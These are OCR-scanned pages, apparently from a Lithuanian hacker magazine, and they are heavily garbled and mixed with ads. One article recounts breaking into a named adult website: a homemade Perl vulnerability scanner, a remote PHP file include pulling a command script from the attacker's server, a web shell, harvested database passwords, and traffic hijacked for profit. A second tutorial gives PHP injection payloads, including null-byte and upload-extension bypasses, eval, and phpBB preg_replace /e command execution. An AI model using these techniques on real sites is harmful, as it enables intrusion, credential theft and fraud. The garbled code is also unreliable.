liausiąkatalogą". Žinoma, tu gali pasinaudoti spe. 
cialiu bylų paslėpimui skirtu branduolio moduliu 
(LKM), kurie įeina į daugelio rootkitų sudėtį, tačiau 
tokiu atveju iškyla paties modulio paslėpimo klau- 
simas. Tutaip patgali paprasčiausiai bylą pašalin! 
sum, o poto ją atstatyti su e2undel (htip:Je2un-I 
del.sourceforge.net), tačiau tokiu atveju atstaty- 
masnėragarantuojamas. Todėl aš tau primygtinai / 
siūlyčiau pasinaudoti įrankiu bmap (htip:/pac- | 
ketstormsecurityorg), kuris leidžia duomenis: 
slėpti „silpnosiose" ext2 arba ext3 failų sistemos 


| 
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„kabinta prie bar.ixt kaip srautas. 2 


„menis slėpti vadinamuosiuose alternatyviuose | 
„duomenų srautuose (ADS — Alternative Data 
„ Streams). Tokius srautus galima sukurti ne ti 
bet kokios NTFS sistemoje saugomos bylos | 


iduje, bet net ir kataloge, tuo pačiu srautuos; 
išsaugoti duomenys bus visiškai nematomi sis: 


„temai, nors bendra disko vieta ir mažės. Alter- 
G: Kaip geriau paslėpti savo bylą Li- natyvių duomenų srautų formatas yra toks: 
„bylos pavadinimas:srauto pavadinimas:atri- 


butas 


Atributo laukas nėra būtinas. 


Pavyzdžiui, štai taip bylą arba bet kokios eg- 


istuojančios bylos turinį galima nukopijuoti į 


Eva) srautą: 


C:>type bigfile.exe >> bar.txt:bigfile,exe 


Paleisti bigfile.exe tiesiog iš srauto gali 
tokia komanda: 


| file2.txt. Norint ištrinti (pašalinti) informaciją iš 


vmmouse. present = «<FALSE" 
| svga.maxFullscreenRefreshTick = <2" 


| Paprastaito pakanka, kad būtų galima sėkmin- 
gai dirbti. 


| 


4 


INTERNETAS — TAI VIENAS MILŽINIŠKAS PORNOAR- 
CHYVAS SU NEDIDELĖMIS KITOKIO TURINIO SVE- 
TAINIŲ SALELĖMIS. DĖL TO VISIŠKAI NESUPRANTA- 
MA, KODĖL TIEK MAŽAI ĮSILAUŽIMŲ NUKREIPTA ŠIA į 
LINKME. PRIEŠ PORĄ MĖNESIŲ AŠ NUSPRENDŽIAU 
UŽPILDYTI ŠIĄ SPRAGĄ IR „PADARYTI“ VIENĄ DIDELĮ 
PORNOARCHYVĄ. 


udėjo, lyg juos bandytų iš 
smegeny. kosi mintys 
t nereikėjo vakar gerti ir ką gi reikėtų daryti šiandien 
pimo aš nusprendžiau sukaupti visas jėgas ir nueiti su 
Aha, svajok toliau! Vos tik aš kyštelėj 
patikrinti savo turtus, kaip teko skaudžiai nusivilti, ir 
nan užteks tik mėtiniam orbitui 


šgerti ala au ranką į 


norėdama 


J,kad litu 


sugalvoti, kaip užsidirbti pinigų. Ir staiga į galvą 
Mano pažįstamas prieš maždaug dvi savaites 
lautuometujis manęsvisiškai nesudomino. Sandėrioesmė 
Uu buržujų svetaines, kad potoišjų persiuntinėčiautroja 
i tokį tinklo srautą pardavinėčiau kitiems pirkėjams 


buvotokia 
nus arba banalį 


Be abejo, tai netoks ja 
kia, t 


rus reikalas, oir su įstatymu visa tai prasilen- 
kur dingti. Pinigų manija mane visiškai užvaldė 
ngiau savo ilgu ir pavojingu keliu į laimę 


au nebeturėja 


PORNŪCHĄ UŽSISAKINĖJOTE? 
Pirmas daly kurį man reikėjo padaryti tai rasti auką. Be abejo, 
rinktis tikrai yra iš ko, tačiau man norėjosi kažko ypatingo. Aš norėjau 
surasti svetainę, kuri atneštų gerą, stabilų pelną. Gerai, paieškokim ko 
nors tokio. Googlei sušėręs „XXX TEENS PORNO“, aš 
prie kelių šimtų puslapių su pornografiniu turiniu. Akys bėgiojo po pusla- 
pj, aš nežinojau nuo ko pradėti, Šiek tiek pažaidęs sugoogle, apsistojau 


javau priėjimą 
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ties viena nuoroda — www.jamies-galleries.com. Prieš pradėdam 
čiupinėti svetainę, įjungiau VPN. Su tokiais serveriais prasti juokai, ni 
gali ir į galvą duoti. Bet dabar mes ne apie tai 


Svetainėje aš pamačiau daugybę skirtingų nuotraukų, tai s 
nedomino, man reikėjo šiame serveryje surasti skylę. Peržiūrėjęs nuo- 
rodas supratau, kad svetainės varikliukas parašytas su php. Svetainėje 
buvo daugybė skriptų, čia taip pat buvo ir pažeidžiamas forumas VbuJ 
letin 3.0.7, tačiau man tai nieko nesakė. Reikėjo visi Ū 
atidžiau. Žinoma, tai gana nuobodu, tačiau toverta. Tuometu aš nuspren: 
džiau web ataką atidėti vėlesniam laikui ir iš pradžių atidžiau apčiupinėti 
patį serverį. Prisijungęs prie savo seno roo! shello, aš į jį perkėliau švie: 
žiausią nmap, kur jį išpakavau, įdiegiau ir paleidau skenavimą 


Vis dėltočiamanteko patirti žiaurią nesėkmę. Skanerisišvisonenorėjo 
pateikti jokios informacijos apie servisus: dėl to buvo kalta serveryje 
įdiegta ugniasienė. Čia man į galvą atėjo viena kurioziška mintis. Ne 
žinau kodėl, tačiau staiga užsimaniau ištestuoti serverį, ar jame nėra 
cgi pažeidžiamumų. O kas šiame reikale galėjo man padėti? Žinoma, 
cgi skeneris! Aš nusprendžiau jį parašyti savomis rankomis. Galvoje 
jau sumečiau, kaip jis veiks. Apie tai ir papasakosiu 


Kiekvienas skeneris turi turėti paruoštą pažeidžiamumų bazę, kurią būtų 
galima papildyti rankiniu būdu arba automatiškai. Tai yra minimumas, ką 
turėtų turėti skeneris. Dabar apie tai, kaip veikia skenerio viduriai. Iš pra 
džių jis jungiasi prie atakuojamos svetainės. Po to iš iš anksto paruoštos 
bazės jis ima pažeidžiamumąjiir prideda jį į svetainės nuoroda (url), o ser 
veris atsako 200 OK. Tai reiškia, kad serveryje iš tiesų yra toks katalogas 
(byla). Viskas. Taip veikia paprasčiaus eneris. Maždaug tokį daly- 
kąmanir reikia parašyti. Skenerio ilgai rašyti nereikėjo — po 10 minučių 
buvo padarytas pagrindinis skeletas, vėliau aš galutinai viską užbaigiau 
odidžiausią laiko dalį, be jokios abejonės, sugaišau derinimui. Taic 
kas man gavosi Šiame skeneryje nėraniekoypatingo. Paskubomisviską 
rašydamas aš net nepridėjau fork, logų kūrimo ir daugiasrautiškumo. Ta- 
čiauvisatai aš nusprendžiau palikti vėlesniam laikui, kadangi šis skeneris 
buvovisiškai veikiantis. Susitvarkęs su skeneriu nusprendžiau iš pradžių 
jiišbandytitestinėje mašinoje. Ašh15.ru serveryje užregistravau betkokią 
svetainę, sulaukiau hosterio laiško su atsakymu su mano vartotojo vardu 
irslaptažodžiu. Vėliau specialiai serveryje sukūriau katalogą su byla pas- 


POLICE LINE DO NOT CROSS 
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SKENERIS 
*!/usr/oin/perl J 
use IO::Socket; print 'Shostn; 
use strict; J 


my (Shos!name, $iile, 5, 4 close(FILE) 
port) = BAR i i 

Sport or Sport = 80; G Print '[-] Scai 

Shostname=-s/* httBWV/ Sub scanį 


Shoslname=-s//5//. 


chomp $bug; 
$bug = /* $bug unless (šbug =- V); 


My Šstring=shift; 


unless ($remote) ( 
N'; exit 0; ) 


ameSbugn' if scan(Sbug); $remote->autofiush(1); 


my Shtip = gg(HEAD $string HTTPA 4 


HOST: Shostname 
nfinishedAn"; k 


Print Sremote $htip; 
while(<$remote>) 1 


[] ' . Ž m = A Na 

B <šfile") or die “File Sfile not foundln"; US = [O::Socket INET->new (Proto => "tep" retum! ok“ 

as Can started (Shostname:$port) An"; Ža i return undef; 
y Sbug=<FILE>) £ stname, PeerPort => $port); ) 


sword/pass Ixt. Potošį katalogą padėjau į bylą su klaidomis ir paleidau 
skanerį. P0 5-7 minučių skeneris sėkmingai surado minėtą katalogą ir 
bylą pass.(xt, otai reiškia, kad skeneris veikia normaliai! Dabar aš pa- 
ruošiau didelę pažeidžiamumų bazę ir pradėjau testuoti savo skriptą. 
Skenerio paleidimo opcijos buvo tokios: 


Manau, čia susigaudytų net ir vaikas. Užsiundęs skenerį ant svetai- 
nės, aš nuėjau miegoti. Prabudau trečią nakties nuo bepročių kai- 
mynų keliamo triukšmo — visu garsu paleisto Cicino. Neapskentęs 
nusprendžiau daugiau nemiegoti. Išgėręs puodelį kavos nuėjau 
pažiūrėti į savo skenerio būseną. Nė nesakysiu, kad pamatęs rezul- 
tatą labai nustebau. Skeneris surado keletą katalogų, kurie po pati- 
krinimo nedavė jokio rezultato. Jis taip pat aptiko tris labai įtartinus 
skriptus. Ne, nuorodų ten buvo daugybė, tačiau nukreipimas į kitus 
puslapius ar svetaines buvo atliktas su skriptu. Tokie skriptai naudo- 
jami visuose TGP (Thumbnail Gallery Post). Dažniausiai jis vadinasi 
TJ, rečiau — Rotator. Tai buvo ne savadarbis, o pirktas skriptas. Iš 
to išplaukia, kad išeities tekstų internete nerasi, o ir klaidų tokiame 
skripte ieškoti beveik beprasmiška. Taigi jame kapstytis aš nesiryžau 
Antrasis svetainėje esantis skriptas buvo daily.php, kuris paveikslėlių 
galerijas rodydavo pagal dienas. Prieš mano akis naršyklės eilutėje 
atsirado nuoroda: www.jamies-galleries.com/daily.php?day=7. Aš 
prie skaičiaus tuojau pat pridėjau kabutes, o gautą užklausą pasiun- 
čiau serveriui, jis savo ruožtu man atgal spjovė klaidą 


Serverioatsakymasreiškė, kad skripte buvojjungiamossAtm/bylos, 
kurių pavadinimas prasidėdavo „day0“, o antroji bylos pavadinimo 
dalis būdavo imama iš parametro day, perduodamo skriptui su GET 
užklausa, t.y. šioje situacijoje nieko nebuvo galima padaryti. Tačiau 
liko šansas, kad trečiame skripte atsiras naudingesnis pažeidžia- 
mumas. Būtent taip ir buvo. Po to, kai aš nukeliavau mūsų skripto 
pateikta nuoroda, linkas atrodė taip: www.jamies-galleries.com/ 
category.php?cat=teen. Prieš mano akis sušmėžavo 18-19 metų 
mergaitės. Bet mes dabar šnekam ne apie jas :). Aš nusprendžiau 
pakeisti nuorodą, vietoje „teen“ įterpdamas daug ža- 

dantį „test“. Serverisįtai Ti 
atsakė 


SALOS 
LL 


Cha, prieš mus banaliausias include. Tik neperšokęs griovio ver 
čiau nesakyk „Op!“. Aš į savo svetainę persiunčiau paprasčiausią 
štai tokio turinio skriptą. 


Po to šiek tiek pakeičiau nuorodą ir dabar ji atrodė taip: www.ja- 
mies-galleries.com/category.php?cat=http:/manoserveris.com/ 
cmdėcmad=id. 


Smūgis į Enter irlaukimas... Po kurio laiko skriptas atsakė, kad mano 
teisės — nobody, kasreiškėlikviena— dabar mes galime serveryje 
vykdyti komandas, kas jau savaime yra labai gerai 


KAPSTYMOSI METAS 

Dabar manreikėjokapstytis loguose, istorijose ir visur kitur. Aš peržiū- 
rėjau visus įmanomus serveryje saugomus (išskyrus Apache) logus 
Web administravimo priemonei, su kuria administratoriustvarkydavo 
duomenybazę, slaptažodis būdavo perduodamas su metodu POST, 
todėl nebuvo prasmės peržiūrinėti Apache logus, juo labiau kad šis 
slaptažodis vis tiek saugomas duomenų bazėje. Persiuntęs į vieną 
rašymui prieinamų katalogų RS7MySOL ,ašįlindau į serveryje saugo- 
mąbazę, kurios vartotojo vardas ir slaptažodis buvo maloniai pateikti 
administravimo įrankio konfige. Deja, mano dideliam nusivylimui, 
duomenys iš bazės nebuvo išvedami į pagrindinį puslapį. Tuomet aš 
visus surastus slaptažodžius sudėjau į tekstinę bylą, t.y.: duomenų 
bazės slaptažodį ir keletą administravimo slaptažodžių. Po to aš iš 
nutolusio serverio per shellą patikrinau, ar vienas iš mano surastų 
slaptažodžių tiks vartotojui jamie55 — deja, nė vienas slaptažodis 
netiko. Aš nusprendžiau šį įsilaužimą atidėti neapibrėžtam laikui 


THE END 

Praėjo net dvi savaitės, per kurias aš nė neprisiliečiau prie wwwja- 
mies-galleries.com. Vis dėlto vieną gražią dieną aš nusprendžiau vėl 
čia užeiti ir dar šiek tiek pasikapstyti. Kuomet aš užėjau į web shellą, 
mano nustebimui nebuvo ribų: administratorius įdiegė papildomą 
administravimo priemonę, skirtą tam tikrų puslapių reda- 
gavimui, o pagrindinį svetainės puslapį buvo galima 
redaguoti vartotojo nobody vardu. Nuo to laiko 
ašbeveiksavaitę parsisiuntinėjau pornogra- 
finį srautą, iš ko užsidirbau daugiau nei du 
šimtus žalių. Po savaitės serveris užtaisė 
skripte paliktą skylę, uždarė visus mano 
web shellus ir viską, kas galėjo nors kiek 

priminti mano buvimą serveryje. 


aa 


Tikiuosi, tu supratai šios pasakos mo: 
ralą Žinoma, negalima laužti svetimų 
svetainių, vienok jeigu jau nusprendei 
imtis tokio nešvaraus reikalo, geriau 
neskubėk. Kaip matai, iš pradžių įsilau- 
žimas man nieko nedavė, tačiau 
vėliau aš vis tiek gavau priėjimą 
prieresurso 


S Či 
aįstatymams. todėlrekomenduoju nekartoti nieko, kai 
auj 


ItHTTP+2200SOK/ ap 


ia aprašyta. 


Atmink: įsilaužėlio veiksmai prieštar 


i ——————— 
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print "can't Connect 


GALINGAS NEŠIOJAMASIS KOMPIUTERIS ir 
STILINGAS TELEFONAS 


tik 333 Lt,- 


Tavo neribotas mobilusis internetas 


OMNI CONNECT 


Tavo stilingas 
LG KG800 Chocolate 


Verte - 1300 Lt 


Tavo galingas 


"ujitsu Siemens Amilo L1310G . 2 c 
lertė - 2700 Lt p K "A 
4 Ž - E * 2 


=>PHPenetration 


JAU DAUG LAIKO PRAĖJO NUO TO, KAI MUDU 
PRADĖJOME TYRINĖTI PHP-INJECTION ATA- 
KAS. TUSKAITEI MŪSŲ ŽURNALE PATEIKIAMUS 
STRAIPSNIUS, SU GOOGLE IEŠKOJAI PAŽEI- 
DŽIAMŲ SVETAINIŲ IR ORGANIZAVAISI MOKO- 
MĄSIAS INFORMACINIO SAUGUMO PROGRA- 
MAS :). TAČIAU VISI MŪSŲ VEIKSMAI NEDAVĖ 
REIKIAMO REZULTATO: IKI ŠIOLVIS DAR PAŽE!- 
DŽIAMA DAUGYBĖ RESURSŲ! TIESIOG NORINT 
ŠIAS KLAIDAS PANAUDOTI REIKIA PAPILDOMŲ 
ŽINIŲ, APIE KURIAS TU DAR MAŽAI KĄ TENU- 
TUOKI. METASUŽPILDYTI ŠIĄSPRAGĄ! 

SU PROBLEMOMIS SUSIDURIA NET IR TOKIE 
KIETI HAKERIAI, KAIP TU: ATRODYTŲ, SURADAI 
PAŽEIDŽIAMĄSKRIPTĄ, KEITIJO PARAMETRUS, 
SKAITAI KLAIDAS, O NULAUŽTI SISTEMOS NIE- 
KAIP NEIŠEINA. ŠIS STRAIPSNIS TAU KAIPTIK IR 
PADĖS IŠVENGTI TOKIŲ PROBLEMŲ. 


B:86 


V aiklerts, GEA sluystenti GE TI NA kekos 


“ 


N 


ol E. html 
pol L žorm.hral 
poLiL list: html 


popup 
|sinpie 


Klasika 
Labiausiai paplitusios klaidos esmė 


išorinis kintamasis per in- 
clude operatorių pakišamas be jokių tikrinimų. Paprastai taip daro- 
makuriant modulinę sistemą, kur kiekvienas modulis —tai atskiras 
php skriptas, prijungiamas esant tam tikroms sąlygoms. Žvilgtelk 
į pavyzdį 


$umol4anie="main.php'"; 
ir (08 GET[id']) 
include($ GET['id']); 
else 
include(Sumolchanie); 


Prijungiant modulius URL atrodo štai taip: index.php?id=module. 
php.Pakankamai dažnai, jeigu tik to nedraudžia PHP konfigūracija, 
tu į skripto kūną gali įterpti savo kodą, ką įmanoma padaryti taip 
http:/site.com/index.php?id=http://othersite.com/anytile.txt, kur į 
anyfile.txt patalpintas tavo PHP skripto turinys: 

Apeiti šį pažeidžiamumą galima įvairiai. Tu tik pažiūrėk 


$ex=".php"; 
$umol4anie="main" $exp; 
it(ės GET[id') 
include($ GET['id'].$exp) 
else 
include($umolchanie); 


Modulis, saugomas byloje /o/.php, šiuo atveju prijungiamas taip 
http:/site.com/index.php?id=lol. Savo olhersite.com serveryje 
saugomai bylai pridėk išplėtimą .php. Dabar injekcija atrodys lygiai 
taip pat: Attp:/site.com/index.php?id=http://othersite.com/anytile 
Iš tiesų, juk skriptas pats prideda php praplėtimą. Tai buvo pačios 
elementariausios PHP-injection atakos. Toliau aštau parodysiu įdo- 
mesnę medžiagą. 


Beveik istorija 

Perskaitęs šį skyrelį iki galo tu galėsi suprasti, kodėl jo 
pavadinimas būtent toks. Prisimink siaubingą funkciją file 
exists. Taip, tai ta funkcija, kuri tikrina bylos egzistavimą. Ji 
grąžins FALSE kreipiantis į bet kokį nutolusį dokumentą. Tai 
reiškia, kad byla turi būti prieinama serverio failų sistemoje 
Taip galima išvengti bet kokios nutolusio kodo fragmento 
injekcijos 


$ex='.php" 
$umol4anie="main" .$exp. 
if (0$ GET[id']) 

$final=$ GET[id'].$exp, 
else 


$final=$umolchanie; 
if(file exists($final)) 
include(Sfinal); 
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Nesugalvok kartoti mūsų 
patyrimų! 


5 


A Konbepeniym 


Nomas NYTo AO GDNNTOS Wa 
Lt My Asai Garrs 


Ar tokia konstrukcija visiškai saugi? Ne, ne visada. Įsivaizduok, 
kadsvetainėjeyraforumas, kuriame galima persiųsti savobylas. 
Taigalibūtikartusupranešimusiunčiamipriedai,nuotraukosarba 
avatarai. Bet kuriam iš išvardintų objektų galima neišsiduodant 
persiuntimo skriptui prijungti PHP kodą. Tokiu būdu gauta byla 
su kenksmingu kodu bus saugoma serveryje, todėl vien tik 
file exists patikrinimas čia neišgelbės. Kaip tu tikriausiai pats 
supranti, jeigu praplėtimas nebūtųtikrinamas, ovisos viltys būtų 
dedamos į šią funkciją, injekcija pavyktų: j Ša) i 
Beveik visada avatarų praplėtimai neišeina už gif, jpg, jpeg, 
png, o prisegamų dokumentų praplėtimai — už zip, rar, doc 
sąrašo ribų. O kintamajame $exp paprastai būna „php arba 
inc.php. Tai ką gi tuomet daryti, jeigu tavo kenksmingas kodas 
saugomas byloje av132.gif, o index.php viduje pridedamas 
praplėtimas nėra žinomas? PHP turi tokį dalyką, kaip magic 
guotes gpc.Ši PHP opcijaleidžia ekranuoti (pridėti slešą) visus 
užklausoje pateikiamus potencialiai pavojingus simbolius. 
Į šių simbolių sąrašą įeina apostrofas (viengubos kabutės), 
dvigubos kabutės ir t.t. Pavyzdžiui, jeigu tu sausainukuose 
arba GET-/POST- užklausose pasiųsi eilutę antichat's sniffer, 
tai skriptas ją gaus kaip antichalVs sniffer. Ši priemonė 
kreivarankius programuotojus kartais apsaugo nuo jų skriptų 
nulaužimo. Tačiau patyrusiems programuotojams ši funkcija 
suteikia daugiau vargo, nei padeda. Kaip tik dėl to dar galima 
sutikti hosterių, kurie šią opciją išjungia. Būtent magic guotes 
gpc=Off leis mums atlikti injekciją. Potencialiai pavojingiems 
simboliams priskiriamas ir nulinis baitas: jis reiškia eilutės 
pabaigą. Nulinio baito ekranavimas jį nuginkluoja, simbolis 
praranda savo reikšmę. Bet be magic guotes gpc vargu arkas 
nors norės jį ekranuoti. Štai injekcijos pavyzdys: 


http:/site.ru/index.php?id=forum/avatars/user/c20ad4d76ie97759aa27a0c99bff 
6710.gif96008c=[COMMAND] 


Čia 9600 — užkoduotas nulinis baitas URL formatu. /nclude funk- 
cijai perduodama eilutė atrodo taip: forum/avatars/user/av132. 
git[NULLJ.php. Kaip aš jau paminėjau, nulinis baitas „nukerta“ deši- 
neeilutės dalį. Taip perduodamas bylos praplėtimas neturi reikšmės 
ir tu gali į PHP bylą pakišti av132.gif byloje saugomą kodą. Tiesa, 
dabar didžioji hosterių dalis įjungia magic guotes gpc (On) ir taip 
apsaugo savo skriptus nuotriuko su nuliniu baitu. Tačiau irtokiu atve- 
juyrakitų sprendimų 


„Elseif“, arba ką dar galima padaryti 

Be aukščiau aprašytų veiksmų galima dar daug ką sugalvoti, tačiau 
kiekvieną kartą tai priklauso nuo konkretaus pavyzdžio. Tarkim, tu 
turi tokį modulinio varikliuko fragmentą: 


error reporting(0); 

$ex=".php"; 

//šcat - katalogas su moduliais 
Sdefault="main; 
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angis van Avo unisonas 


DO 


exBB administravimo skydelis 
Įpto:/esd6 eindude (tp: /A27-0-0-1Asli 


[2:Ahome/exbL/ ww. 


žkatalogas su moduliais4 

if($ GET[cat]=="files') $cat="files"; 

elseif($ GET['cat']=='docs') $cat="docs"; 

else echo “Wrong cat"; 

ies GET[id']) 
Sfinal=$ GET[id']; 

else $final=$default; 

if(Ieregi("N]", Sfinal) 88 str replace(chr(0),f' „$final)== 
include(S$cat."/'$final.Sex); 

else include("error404" $ex); 


Sfinal) 


Čia netikrinamas bylos egzistavimas. Jeigu GET užklausoje 
parametrocatreikšmė nepatenkina reikalavimų, tu, kaip bebūtų 
keista, gausi perspėjimą apie tai, kad kategorija neteisinga. 
Tačiau skripto vykdymas bus pratęstas. Klaidas autorius 
paslepia su error reporting(0), todėl išoriškai atrodo taip, kad 
viskas buvo apdorota korektiškai. Manau, tu taip pat ne iš kelmo 
spirtas! Jukvietoje cat galima perduoti kažką panašaus į „Attp:// 
othersite.com“ ir į othersite.com perkelti savadarbį skriptą 
Jeigu serveryje įjungta register globals opcija (užklausoje 
pateikti parametrai atitinka to paties pavadinimo kintamuosius 
skripte), tai injekcija pavyks sėkmingai. Situacijose su include 
(ir analogais) per atstumą galima eksploatuoti įdarbinant ne tik 
http, bet ir ftp. 


Mortal upload 

Prisimink pokalbį apie avatarų užkrovimą. Ten mes į forumą 
arba į kokią nors kitą sistemą su vartotojui suteikta bylų 
perkėlimo funkcija perkėlėm bylą. Taip pat paminėjom, kad 
bylų praplėtimai riboti, tačiau kartais tai galima apeiti. Nors 
ši klaida labai aiški, ji vis tiek sutinkama iki šiol. Tarkim, tu 
užkrauni bylą. Nepatyrę programuotojai kartais kuria štai tokį 
praplėtimų patikrinimą: 


$exps=array( 

"rar", 

"Zip", 

'doc', 

x 

J: // Galimi praplėtimai 

// Tikrinam praplėtimą 

Srash=explode('.",$ FILES['userfile"][' name |); 
if(lin array(strtolower($rash[1]), Sexps)) 
die('bylos praplėtimas neteisingas'); 


Klaida čia tame, kad skriptas tikrina ne bylos praplėtimą, o 
tą bylos pavadinimo dalį, kuri yra nuo pirmo kairiojo taško iki 
antro kairiojo taško (jeigu toks yra). Paprastai tai ir yra bylos 
praplėtimas, tačiau jeigu bandytume persiųsti bylą pavadinimu 
shell.txt:php, ši byla būtų perkelta sėkmingai, o serveris ją 
interpretuotų kaip php skriptą (nebent konkrečiam vartotojui 
į „htaccess surašyti atitinkami nustatymai). Iš tikrųjų skriptas 
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iame serveryje saugomas kodas gali būti įterptas tik su atitinkama PHP konfigūracija. 


Išori 


WARNIN 


Įsilaužimas 


turėtų tikrinti paskutinę bylos pavadinimo dalį, gautą išskaidžius 
pavadinimą pagal taškus. Kita apdorotuvo versija: 


$exps=array( 

rar 

Zip) 

"doc 

"xi 

): // Galimi praplėtimai 

// Tikrinam praplėtimą 

Srash=explode('.",$ FILES['userfile']['name']); 
if(count($rash)< 2)die('byla neturi praplėtimo'); 
if(lin array(strtolower($rash[count($rash)-1]), $exps)) 
die('bylos praplėtimas neteisingas'); 


Įvertinus Apache (ir kitų) serverio ypatybes galima tvirtinti, jog 
šis patikrinimo variantas taip pat yra pažeidžiamas, o rašant šį 
straipsnį pažeidžiama buvo daugybė žinomų ir nelabai PHP vari- 
kliukų. Kur gi tas pažeidžiamumas? Jeigu Apache negali nusta- 
tyti bylos praplėtimo, jis žiūri į kitą tašku nuo praplėtimo atskirtą 
bylos pavadinimo dalį. Pavyzdžiui, byla arhive.php.ex daugeliu 
atvejų bus interpretuota kaip PHP skriptas! 

Finale vienintelis teisingas sprendimas būtų pilnas bylos pava- 
dinimo filtravimas, t.y. pavojingų užkraunamų bylų praplėtimų 
paieška. Taip pat norint apsidrausti tokias bylas rekomenduo- 
jama įkelti į katalogą su .Ataccess bylomis, kuriose būtų paša- 
linami/iš naujo apibrėžiami pavojingi praplėtimai. Pavyzdžiui: 
Removelype .php3 .php .phtml .php4 .php5 .cgi.pl. 

Galima pasielgti ir kitaip — serveryje išsaugoti bylas su pakeis- 
tu pavadinimu (tarkim, file<index>file, kur <index> — bylos nu- 
meris), o persiuntimo metu remiantis iš anksto kokioje nors DB 
išsaugotais duomenimis apie šią bylą formuoti specialią HTTP 
antraštę, kad vartotojui byla būtų persiunčiama tikru pavadini- 
mu. Bylas taip pat galima saugoti kokioje nors duomenų bazėje, 
pavyzdžiui, MySOL 


remview.php-remote — php.spb.ru 
sukurtas bylų valdymo įrankis 


38 20/1NJOS 2357 myphebbjmyghebo 1w4-1- 


Browssto 2288 65 20/11J05 2257 iyptebb/mychebo +w4-+- 
Brovs boikoto 2483 44 2O/1/0S 2357 myphobb/myphebo 14-1- 
Boino po 4656 60 20/11/05 2257 myptebb/myphebo wat 
Bpatna.athoto 2087 45 20/1NJOS 2257 myghebbjmyptobo 1-1 
Bpatrer 4000 4852 65 20/14/052357 myptebbjmyphebo +w4-1- 
Boat bono 850 06 2010 2257 myphebb/myptebo 1w+-1- 

go 4780 68 A0JIIJOS 2857 myptebbimyshobo wit 


Setup | PHP eval | phpinfo() | Shell Į Chor map | Language: English/Russian 


phoRemoteView O Dmitry Borodin (version 2003-04-22) 
Free download « No //pho 400 rU/remview/ 


£— 


eval 

Darviena „bloga“ funkcija — eval. PHP kalboje ji jai perduotą eilutę 
interpretuoja kaip PHP kodą. Be šios funkcijos galima kuo puikiausia 
apsieiti praktiškai bet kurioje PHP programoje. Labai dažnai ji nau- 
dojama patogiam template'ų (šablonų, kokio nors varikliuko temų) 
pakeitimui, nors tai galima padaryti ir be eval. Įdarbinus štai tokią 
eilutę buvo nulaužtas vienas hakeriškas resursas, kurio čia neįvar- 
dinsiu: 

eval(1$$register poll vars[$i] = V" trim($HTTP GET 
VARS[Sregister poll vars[$i]])."V';*) 


GET'e perduodamas id parametrą id=($(php codejj pavidalu aš 
gavauweb shellą. Kąreiškia $/php code]] — skaityk žemiau 


„preg replace“ — kam ten „Je“? 

Funkcijapreg replace pakeičiareguliariąja išraiška nurodytą eilutę 
(pirmąjį parametrą) į kitą eilutę (antrasis parametras), kuri taip pat 
gali būti nurodyta kaip tos pačios eilutės reguliarioji išraiška (tre- 
čiasis parametras). Taip pat dar egzistuoja neprivalomas trečiasis 
parametras, tačiau jis mūsų nedomina 

Pakeičiamos eilutės formatas yra toks: 


[skyriklis][išraiška] [skyriklis] [modifikatoriai] 


Skyriklis — tai bet koks simbolis ne iš abėcėlės (dažniausiai „/* 
arba „*“), išraiška — pakeičiamo fragmento šablonas, o modifi- 
katoriai —savotiškos rodyklės. Jos nurodotaisykles, pagalkurias 
turi būti apdorota reguliarioji išraiška. Kiekvienas modifikatorius 
įrašomas kaip raidė. Pavyzdžiui, modifikatorius / reiškia paiešką 
nevertinant didžiųjų/mažųjų raidžių (neatsižvelgiant į registrą). 
Pakeičiančioje eilutėje gali būti panaudoti pagrindinėje eilutėje 
atliktos paieškos rezultatai. Pakeičiamoje subeilutėje rezultatų 
fragmentai logiškai žymimi įkeliant juos į skliaustus. Pavyzdžiui, 
„/(*)/i“ reiškia visą šią eilutę patalpinti į rezultato eilutę Nr.1. Re- 
zultatai numeruojami pradedant nuo pirmojo (1) išeilės, iš kairės| 
dešinę. Norintrezultatą, kurionumeris yran, išsaugoti, pakeičian- 
čioje eilutėje naudojama konstrukcija Wn arba $n. Pavyzdžiui: 
$c="aba";$c=preg replace('/([ab]+)/i", *<b>$1</b>", Sc) 

Čia kintamasis $c pavirs į <b>aba</b>, Tave, be jokios abejonės, 
sudomino preg replace naudojamas modifikatorius „e“. Jis skirtas 
tam, kad prieš pradinėje eilutėje pagal reguliarią išraišką surastus 
fragmentus pakeičiant naujomis eilutėmis (replacement), šią eilu- 
tę būtų galima interpretuoti kaip PHP kodą. Tai reiškia, kad jeigu 
pas mus yra eilutė $c="ping", tai įvykdžius štai tokį PHP skriptą: 
8$c=preg replace('/* (*)$/ie", "print( M)", 80), mes gausime eilu- 
tės $c turinį, t.y. „ping“. Realiai aptarsime nuskambėjusią PHP in- 
jekciją phpBB forume, viewtopic.php kode. Pabandykime suprasti, 
kame šiosinjekcijos esmė. Taigi štai viewtopic.php fragmento kodas 
išphpBB 2.0. 15: 


$message = str replace(V' substr(Opreg replace 
(A0>(((?>([" ><]+|(2R)))*N<)) se", 

"apreg replace(Ab(“ . str replace(N 

"V, Shighlight match) . "Noi 

"<span style=Vcolor:4" . Stheme[fontcolor3'] 
N><b>M </b></span>", W0') 

„'>'. $message . '<!), 1,-1)) 
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highlight match — kintamasis, kuriame saugomi išryškinami žo- 
džiai. Vartotojas nurodo $ GET['highlight'], kur tarpai atskiria skir- 
tingus žodžius. $highlight match — jo palikuonis, kur vietoje tarpų 
naudojamas |. Sunku susigaudyti tokioje ilgoje išraiškoje. Dėl to 
tiesiog žiūrėk taip: $highlight match naudojamas kaip funkcijos 
preg replace parametras replacement, o pakeičiamoje eilutėje 
naudojamas modifikatorius „e“. Beje, $highlight match niekur ne- 
keliamas į addslashes. Tai reiškia, kad mes ramia sąžine galime 
įsiterptijtą PHP skriptą, kuris bus įvykdytas prieš eilutės pakeitimą, 
eilutėje $message. 

Jeigu vartotojas highlight nurodytų .systemn( dir').“, tai skripto veiki- 
mo rezultatas būtų: 


preg replace(*Ab( .system('dir') Noži', |. 


preg replace with /e and with NULL 

Sąlyginai galima manyti, kad nesugadintas magic guotes gpc 
arbaaddslashes NULL nukerta dešinę eilutės dalį. Kam tai gali 
būti panaudota? Pasirodo, daug kam. Tereikia turėti vaizduotę. 
Konkrečiau šnekant, NULL galima panaudoti dirbant su preg 
replace. Jeigu reguliariosios išraiškos surastoje pakeičiamoje 
eilutėje yra kintamasis, kurį vienaip ar kitaip apibrėžia varto- 
tojas, galima pamėginti pakeičiamos eilutės struktūrą pakeisti 
taip, kad pabaigoje būtų modifikatorius/e. Pažiūrėk į šį paprastą 
pavyzdį: 


preg replace("/šcži", W', $mda); 


Įsivaizduok, kad tiek $c, tiek ir $mda galima kažkaip apibrėžti, 
